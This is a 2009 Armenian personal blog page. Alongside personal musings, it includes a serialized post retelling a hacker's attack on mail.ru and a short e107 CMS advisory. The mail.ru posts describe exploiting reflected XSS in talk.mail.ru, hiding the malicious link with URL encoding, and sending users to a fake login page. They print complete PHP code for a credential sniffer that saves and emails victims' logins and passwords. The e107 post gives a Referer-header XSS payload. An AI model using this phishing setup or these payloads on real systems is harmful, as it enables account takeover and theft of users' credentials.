Էլի մտածում եմ…

Wednesday, September 30th, 2009

Եթե հետևենք բոլոր հայեցի, հայկական ու մենթալիտետական մտածելակերպերին /երևի սրանք համահոմանիշ բառեր են/, պետք ա Երևանի ջահել-ջիվան-սիրուն-աշփութ աղջիկներին թողենք, գնանք հասնենք ԳՅՈՒՂ /ոմն գյուղ, ասենք օրինակ Ղզլջուղ, իմիջայլոց ովքեր չեն լսել, քրքրեք պատմությունը  :ՃՃ / ու ԿՆՈՒԹՅԱՆ առնենք կարմիր թշերով մի աղջկա, որ երևի անկեղծորեն հավատում ա, թե համբուրվելիս աղջկա չգիտեմ որ ոտքն ինքնաբերաբար բարձրանում ա:

Վերջերս շատ եմ հետևում օր-օրի աշխուժացող բլոգային կյանքին, ու… ՎԱՏ ՆՈՐՈՒԹՅՈՒՆՆԵՐ, հարգելիներս/ես կասեի հարգելի ընթերցող, բայց տենց մի քիչ պաշտոնական ա ու բացի դրանից հռետորական ոճ չեմ սիրում/: Անկեղծ ասած օր-օրի սնկի պես աճող բլոգերից շատերում նկատում եմ էսպիսի մի տենդենց/հայերեն հոմանիշ չգիտեմ/, գրում ենք անկեղծ, սրտանց, բայց… Թաքցնում ենք որոշ ինտիմ/շեշտում եմ էս բառը/ մանրամասնություններ, կամ պարզպես ընտրում ենք դրանց հոմանիշ այլ բառեր, որոնք ՑԱՎՈՔ ոչ լրիվ կերպով են ներկայացվում անհրաժեշտ բառի իմաստը: Ը~հը…

Ես օրինակ մի ընկեր ունեմ/իմիջայլոց աղջիկ-ընկեր/, որ իմ “սեքսուալ” բոլոր թիթիզ-միթիզ բառերին պատասխանում ա նույն կերպ ու չի էլ մտածում, որ դա կարող ա վնասել նրա ԻՆՔՆԱՀԱՍՏԱՏՄԱՆԸ: Հա հենց, ինքնահաստատմանը, այլ ոչ թե ուրիշների կարծիքին իր անձի մասին: Ես եկել եմ մի համոզման, որ ՀԱՐԳԵԼԻ ԲԼՈԳԵՐՆԵՐ, Ձեր անհատական բլոգ-երում, ոչ մեկ Ձեր ձեռքը չի բռնում ու ՖԼՈՒԴ-ԲԼՈԿ չի դնում Ձեր բառերի վրա:

Մեկ էլ ավելացնեմ, որ ինչքան աղջիկը տեղյակ ա սեքսից, էնքան նրա հետ սեքսով զբաղվելն ավելի հաճելի ա… Մտածեք ասածներիս մասին…

Ես էլ եմ մտածում…

30.09.2009 Մտորումներս No Comments

Բա ես մեղք ունե՞մ

Tuesday, September 29th, 2009

oԱյ մարդ բա մեկը չլինի՞ ասի “Այ Վարդան, այ մարդ, հերիք ա էդքան նստես էդ կոմպի դեմը…”: Չէ, բա սաղ հանգիստ, սիրուն, համեստ մարդ են տեսել, առիթից ուզում են օգտվեն: Արա դե սիրում եմ էլի ես բլոգս, գրում-գրում եմ էլի գրելու բան ա մնում: Համ էլ կարդացողն ո՞վ ա, երևի մենակ ես եմ մտնում ադմին պանելից սպամ-կոմմենտներս ջնջում: Լոլ…

Հա իմիջայլոց, տեսնես ԼոԼ ինչ ա նշանակում ու արդյոք չկա դրա հայերեն տարբերակը, ասենք օրինակ` ուահա :) )

Հա լավ, վերադառնամ բուն թեմային, ինչպես սիրում եմ արտահայտվել, “Էկեք չմոռանանք` ինչի համար ենք հավաքվել”:

Մի խոսքով էսօր ահավոր գժվել եմ: Առավոտ քշերով ժամը 9-ին զանգում են քնից հանում ու էն էլ իմ արձակուրդի օրերին, դա արդեն ԱՆՆԵՐԵԼԻ ա իմ կողմից: Ես, հարգելիներս, արձակուրդիս օրերին քնում եմ գիշերվա 3-ին կամ 4-ին ու սիրում եմ երկար քնել, հատկապես առավոտվա կողմերն ընկած ժամերին: Բայց արի ու տես, որ էսօր չգիտես խի մարդուն պետք էր էտ նկարը  ու հատկապես առավոտվա 9-ին: Այ մարդ դե քնեք էլի Ձեր համար… Կամ եթե քնել չեք սիրում, թողեք գոնե ՆՈՐՄԱԼ ՄԱՐԴԻԿ քնեն… մենք էլ ենք մարդ. մենք էլ աչքեր ունեն… բա մեկը չլինի՞, որ ասի “Աչքդ լու~ս, էսօր հոգնած չես էրևում”… Ես մեղք ունե՞մ, որ…

Ու~ֆ լավ է…

29.09.2009 Մտորումներս No Comments

Mail.ru – Անհնարին ոչինչ չկա – օր երկրորդ

Tuesday, September 29th, 2009

mail.ru

- – - նյութի սկիզբը կարող եք կարդալ այստեղ – - -

[օր երկրորդ...]

Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում`

http://talk.mail.ru/login.html?target=”><script>location.href=’Վերահասցեավորում դեպի ֆիկտիվ ֆորմա’</script>

Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, ու մենք մի քիչ այն դիմակավորեցինք, որպեսզի յուզերները ոչ մի գալիք վտանգ չզգան: Արդյունքում ստացանք ահա սա`

http://talk.mail.ru/login.html?targe…72%69%70%74%3e

Հաջորդ քայլում արդեն գրեցինք մի փոքրիկ սնիֆֆեր, որը ստանում էր իրեն փոխանցված տվյալները, գրում ֆայլի մեջ, իսկ վերջում յուզերին “շպրտում” իր փոստարկղ: Ահա սնիֆֆերիս կոդը`

<?
$adminmail = “mymail@mail.ru”;
function email($to,$mailtext) {
mail($to,’password’,$mailtext,$adminmail);
}
$text=”[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n”;
email($adminmail,$text);
$file = fopen(“logs.txt”,”a”);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo “<FORM id=’auth’ action=’http://talk.mail.ru/login.html’ method=post>
<INPUT value=’$_POST[login]‘>
<INPUT value=’$_POST[pass]‘>
<script>auth.submit();</script>
</FORM>”;
?>

Ուշադրություն դարձրեք, թե ինչպես է յուզերը մտնում իր փոստարկղ (տող 17)`

<script>auth.submit();</script>

Ֆիկտիվ էջի (այսուհետ` ֆեյկ) պատրաստման գործընթացն էդքան էլ դժվար չէ, ֆայլը պահում ենք մեր կոմպի վինչի մեջ, իսկ form տեգի action փոփոխականը ռեդիռեկտ ենք անում: Արդյունքում, յուզերի կողմից մուտքագրված տվյալները գրվում են իմ ֆայլի մեջ, իսկ ինքը կտեղափոխվի փոստարկղ, ու կմտածի, որ DNS-ի խնդիր էր տեղի ունեցել կայքում…

- – - Շարունակելի – - -

29.09.2009 Մի կայքի պատմություն 4 Comments

Միջ-կայքային սկրիպտավորում e107 cms-ում

Tuesday, September 29th, 2009

Համակարգը`  e107 0.x

Այս բացը թույլ է տալիս գարնցված անդամին կատարել  XSS հարձակում համակարգի վրա: Բացն առաջացել է  “Referer” HTTP վերնագրային տվյալների ոչ լրիվ մշակումից: Հարձակվողը կարող է աշխատեցնել փոփոխական սկրիպտեր “թիրախ”-ի համակարգչի բրաուզերում:

Ահա և Exploit-ը

Referer: ‘><script>alert(document.cookie)</script>

29.09.2009 Դեսից Դենից No Comments

Mail.ru – Անհնարին ոչինչ չկա – օր առաջին

Monday, September 28th, 2009

mail.ru

Այն ինչ գրում եմ, պարզապես ներկայացնում եմ մի հակերի պատմությունը` իր իսկ նկարագրությամբ: Նյութի մեջ առկա տեղեկատվությունը միտված է ընթերցողներին զգուշացնելուն: Նյութի հետևանքների համար ես ՊԱՏԱՍԽԱՆԱՏՈՒ չեմ… Նյութը հասկանալու համար պետք է գոնե մի քիչ գիտելիքներ ունենաք sql-ինյեկցիաների և XSS հարձակումների մասին:

Հասկանալի՞ է… ուրեմն գնացին: Հիշեցնեմ որ պատմությունը պատմվում է հենց այդ մարդու կողմից, իսկ ես միայն թարգմանում եմ..

[օր առաջին...]

Գիշերվա երկուսն է, ես արդեն պատրաստվում էի քնել, բայց որոշեցի նախքան քնելը ստուգել էլ.փոստս: Մտնելով փոստարկղս  (ես գրանցված եմ մեյլ.ռու-ում), տեսա շատ մեծ քանակությամբ սպամ-նամակներ:  Գրողի տարած անտի-սպամ, աշխատում է գրեթե անարդյունք ու զզվել կարելի է: Իսկ առջևում Նոր Տարի է, և կարծես թե հենց մեյլ.ռու-ն ինձ “սպամ-նվերներ” էր մատուցել: Վերջապես ամոթ ա, արի ես էլ նվեր մատուցեմ “շատ սիրելի” փոստային համակարգիս:

Բայց արի ու տես, որ ինչքան էլ քրքեցի սրանց համակարգը, ոչ մի բաց չգտա: Դե ինչ, էստեղ հույս ունեմ կօգնի շատ սիրելի գուգլը: Դե քանի որ մեյլ.ռու-ն ունի շատ այլ ծառայություններ, գուցե հենց դրանց մեջ բաց տեղեր կան, և ես որոնման հարցումս ձևակերպեցի այսպես`  “site:*mail.ru” :  Ի պատասխան դրան, հարգարժան գուգլն իմ առջև բացեց հղումների 20 էջեր (բախտս բերեց դրանց կեսը կրկնվում էին, այլապես հոգեբուժարանում կլինեի հիմա): Լցրեցի սիրելի մեծ բաժակս սուրճով և սկսեցի ստուգել սերվիսները: Ինչքան էլ  զարմանալի լիներ ինձ համար, բայց մեյլ.ռու-ի վեբ կոդեր-ները լավ էին աշխատել, քանի որ 2 ժամանոց աուդիտից հետո ես ոչ մի բաց չէի գտել նրանց կոդի մեջ: Այդ պահի դրությամբ շտկվել էին որոշ թերություններ 7ya.mail.ru սերվիսի աշխատանքում, նկարները դիտելու ժամանակ բացվում էր popup պատուհան, հիշելով հետևյալ հասցեն`

http://7ya.mail.ru/image.php?in=phot…=500&big_h=375

Ես որոշեցի այն մի քիչ տեսքի բերել և ստացվեց ահա այսպիսի գեղեցկուհի`

http://7ya.mail.ru/image.php?in=”><font color=ORANGE size=10>Russian Net Hunters – Rulezzz</font>

Ինչպես տեսնում ես, ստացվեց – Russian Net Hunters Rulezzz. Դե իսկ մեյլ.ռու-ի վերջին սերվիսներից մեկը  форумы@mail.ru-ն էր: Առաջինը, որ փորձեցի, sql-ինյեկցիան էր, որն իհարկե ոչ մի արդյունք չտվեց, իսկ համակարգն ինձ ռեդիռեկտով դուրս շպրտեց մի էջի վրա, որտեղ գրված էր, որ ես գրանցված չեմ: Բայց այստեղ ուշադրությունս գրավեց շատ հետաքրքիր մի տող`

http://talk.mail.ru/login.html?target=

Փորձեցի ստուգել target փոփոխականը XSS-ի տեսանկյունից և բրաուզերիս մեջ հավաքեցի`

http://talk.mail.ru/login.html?target=”><script>alert();</script>

Շատ զարմացա և ուրախացա երբ իմ առջև դուրս թռավ պատուհան, որը նշանակում էր, որ target փոփոխականը ոչ մի ֆիլտրացիա չի անցնում: Ըհը~… ՈՒրեմն որոշված է, սարքում եմ համակարգ մուտք գործելու ֆիկտիվ էջ, որպեսզի յուզերներն իրենք իրենց ձեռքով ինձ ուղարկեն գաղտնաբառերը: Առավոտվա ժամը 5-ն էր,և նույնիսկ 5 բաժակ սուրճից հետո ահավոր քնել էի ուզում (իսկ ավելի շատ զուգարանի կարիք ունեի): Այդ պատճառով խնդրեցի իմ լավ ընկեր pixcher-ին շարունակել իմ սկսած գործը:

—— Շարունակելի —– Խնդրում եմ գրել կարծիքներ, արժե՞ արդյոք շարունակել “Մի կայքի պատմություն” բաժնի մշակումը…

28.09.2009 Մի կայքի պատմություն 3 Comments

Էջեր: 1 2 Հաջ

Վճարված գովազդ ::